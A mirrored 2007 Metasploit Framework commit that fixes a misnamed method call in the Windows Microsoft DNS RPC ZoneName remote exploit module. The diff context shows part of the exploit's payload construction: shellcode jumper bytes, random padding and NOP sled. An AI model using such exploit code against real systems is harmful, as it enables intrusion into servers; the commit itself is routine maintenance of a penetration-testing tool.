1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
git-svn-id: file:///home/svn/framework3/trunk@4680 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2007-04-14 07:59:13 +00:00
parent 3c9007a7be
commit b5b4556ee7

View File

@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
"\x81\xef" + [-0x0604].pack("V") +
"\xff\xd7"
txt = Rex::Text.text_rand_alpha(480)
txt = Rex::Text.rand_text_alpha(480)
txt << make_nops(160)
txt << jumper